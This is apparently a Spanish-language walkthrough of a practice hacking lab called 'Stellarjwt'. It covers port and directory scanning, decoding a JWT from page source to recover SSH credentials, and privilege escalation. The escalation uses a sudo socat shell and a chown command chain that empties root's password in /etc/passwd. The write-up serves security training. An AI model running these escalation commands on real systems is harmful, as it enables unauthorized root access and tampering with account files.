# Stellarjwt

### 🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 172.17.0.2
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FEhYrFMrsspAx4abCVuga%2Fimage.png?alt=media&#x26;token=ece3cdd3-3a35-4f81-a74d-d66d259ba148" alt=""><figcaption></figcaption></figure>

A continuación, realizamos el comando:

```bash
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FXbN0D1fHZlEjWbAgq1OH%2Fimage.png?alt=media&#x26;token=b78aa198-4e3b-4116-b15d-ed7cfa7e01fc" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH** y el **puerto 80** perteneciente al **servicio HTTP** están abiertos por lo que a continuación se indagará más.&#x20;

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80 -v 172.17.0.2
```

para obtener más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fz650akMO8qXaGGjZvN2A%2Fimage.png?alt=media&#x26;token=459fb512-c968-4a3c-978d-4dee70c7741a" alt=""><figcaption></figcaption></figure>

Seguimos indagando más sobre los puertos y ahora indagamos sobre el **servicio HTTP**. Se ingresó la **dirección IP** en el navegador lo que llevó a que la página web sea algo de la NASA.&#x20;

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fe8XkxNmfXGO5sgXEDv2e%2Fimage.png?alt=media&#x26;token=1f0fcae4-e6ff-4a01-a070-8fa582d1f3ee" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FzuSET8bsosZ20StZuIx9%2Fimage.png?alt=media&#x26;token=77de1a1e-4403-4c52-a5b2-62ee7b6d2697" alt=""><figcaption></figcaption></figure>

Ahora buscaremos directorios y archivos con la herramienta **Gobuster** a través de:

```bash
gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FKdcHwScZI2QRPfQz4IMF%2Fimage.png?alt=media&#x26;token=c86e356f-b188-4789-a569-828040e49b2f" alt=""><figcaption></figcaption></figure>

Encontramos un directorio `/universe` que entramos en él.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FzADg1LXURsPz328ck85j%2Fimage.png?alt=media&#x26;token=dd4f947d-6b95-4746-8727-59fcac0d6c14" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Revisando el código fuente encontramos un fragmento interesante.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FgEa28reqqq80cxyvQVF8%2Fimage.png?alt=media&#x26;token=21f5bc5b-a9b5-4222-8250-b679c5bd9ac0" alt=""><figcaption></figcaption></figure>

Decodificamos esa cadena con esta [página](https://cyberchef.org/#recipe=JWT_Decode\(\)).

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FVaHZBVOL1x1dSBI5ehJd%2Fimage.png?alt=media&#x26;token=28f712fe-a1d8-4554-a631-b613305f6e7a" alt=""><figcaption></figcaption></figure>

Nos logueamos con ese usuario y con la contraseña **Gottfried**.

```bash
ssh neptuno@172.17.0.2
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FdyNrCPohkbH7oIzawcjC%2Fimage.png?alt=media&#x26;token=8cd58a3e-2c8f-4e32-b063-aae5ed5531bb" alt=""><figcaption></figcaption></figure>

### 🔐 **PRIVILEGIOS**

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar. No tenemos permisos **SUDO**.

Listando los directorios tenemos un archivo oculto.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FbjdXP163h7Y5U1UdEwQc%2Fimage.png?alt=media&#x26;token=94c41ab5-47c2-48f9-bb95-87ac8d04273d" alt=""><figcaption></figcaption></figure>

Vemos que tenemos 3 usuarios y uno de ellos es la **nasa** asi que nos logueamos ya que la contraseña es **Eisenhower.**

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FEuo7Vf74mkdUTUNUd3zN%2Fimage.png?alt=media&#x26;token=a2ac3a49-d2f4-47da-a711-0380b62dbbe9" alt=""><figcaption></figcaption></figure>

Nos llama la atención **socat** por lo que buscamos en esta [página ](https://gtfobins.github.io/gtfobins/socat/)cómo explotarlo.

```bash
sudo -u elite /usr/bin/socat stdin exec:/bin/sh
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FTD5ynTef6DQt2ZXJqsgR%2Fimage.png?alt=media&#x26;token=1311260b-7b53-4889-845e-927dba886479" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FeTyH5BZ3kEC6YeHfPqC4%2Fimage.png?alt=media&#x26;token=77f57470-228e-4300-b9b5-9a4d36987e5b" alt=""><figcaption></figcaption></figure>

Nos llama la atención **chown** por lo que buscamos en esta [página ](https://gtfobins.github.io/gtfobins/chown/)cómo explotarlo.

```bash
sudo chown elite:elite /etc/ && sudo chown elite:elite /etc/passwd && echo "$(cat /etc/passwd | sed 's/root:x:/root::/g')" > /etc/passwd && su
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FRNYOToIryDd3mj6GDs70%2Fimage.png?alt=media&#x26;token=ae467675-86b8-4325-9f58-3162a59c668f" alt=""><figcaption></figcaption></figure>
